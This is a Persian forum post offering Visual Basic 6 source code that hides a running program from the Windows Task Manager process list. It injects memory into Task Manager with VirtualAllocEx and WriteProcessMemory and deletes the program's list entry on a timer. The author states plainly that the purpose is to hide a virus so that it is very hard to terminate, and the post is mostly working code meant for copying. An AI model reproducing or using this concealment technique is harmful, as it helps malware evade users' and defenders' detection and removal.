قدیما یه کد تو دلفی نوشته بودم که برنامتو از تسک منجرو اکسپلورر ,regedit,meconfig مخفی میکرد نمونه شبیه به اون رو به وبیب پیدا کردم امیدوارم مفید واقع بشه
.برای این کار باید ابتدا vb رو اجرا و بعد standard exe رو انتخاب کنیم و سه مرحله کار انجام بدیم[/quote]
مرحله ی اول
اول این کدها رو در قسمت general کپی کنید
کد:
Private Type bkh
flag As Long
psz As Long
lParam As Long
pt As Long
vkDirection As Long
End Type
Private Declare Function VirtualAllocEx Lib "kernel32.dll" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetWindowThreadProcessId Lib "user32.dll" (ByVal hwnd As Long, ByRef lpdwProcessId As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function VirtualFreeEx Lib "kernel32.dll" (ByVal hProcess As Long, ByRef lpAddress As Any, ByRef dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long
Private Declare Function KillTimer Lib "user32.dll" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32.dll" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
حالا این کدها رو جدا از قسمت form_load و general کپی کنید که خودش یک قسمت باشه
کد:
Private Sub Hide_Process(Name As String)
Dim pName As Long
Dim pType As Long
Dim l As Long
Dim Tid As Long
Dim hTid As Long
Dim pid As Long
Dim h As Long
Dim i As Long
Dim hProcess As Long
Dim f As bkh
Dim s As String
Dim bkh() As Byte
h = FindWindow(vbNullString, "Windows Task Manager")
KillTimer h, 0
h = FindWindowEx(h, 0, "#32770", vbNullString)
h = FindWindowEx(h, 0, "SysListView32", vbNullString)
If h = 0 Then Exit Sub
f.flag = 8 Or &H20
Call GetWindowThreadProcessId(h, pid)
hProcess = OpenProcess(1082, 0, pid)
bkh = StrConv(Name, vbFromUnicode)
pName = VirtualAllocEx(hProcess, 0, Len(Name) + 1, &H1000, 4)
WriteProcessMemory hProcess, pName, VarPtr(bkh(0)), Len(Name), l
f.psz = pName
pType = VirtualAllocEx(hProcess, 0, Len(f), &H1000, 4)
WriteProcessMemory hProcess, pType, VarPtr(f.flag), Len(f), l
i = SendMessage(h, &H1000 + 13, 0, pType)
If i <> -1 Then SendMessage h, &H1000 + 8, i, 0
VirtualFreeEx hProcess, pType, Len(f), &H8000
VirtualFreeEx hProcess, pName, LenB(Name) + 1, &H8000
End Sub
حال یک timer با interval مناسب(مثلا" 1) درست کنید و کد زیر رو در timer قرار بدید
Hide_Process CStr(App.EXEName & ".exe")
در این جا باید بگم که منظور از app.exename،نام فایلی ویروس است و اگر نام فایلتان را مثلا" h بذاری،app.exename هم h می شود.حال ما ویروسی رو داریم که در لیست process های taskmanager مخفی است و از حالت اجرا درآوردن ویروس رو بسیار بسیار سخت میکنه
صفحه اصلی
انجمن
جستجو
فهرست اعضا
افزونه های فایرفاکس
» 
کم کم باید جامون رو بدیم به جوونا 
)
تشکر شده توسط :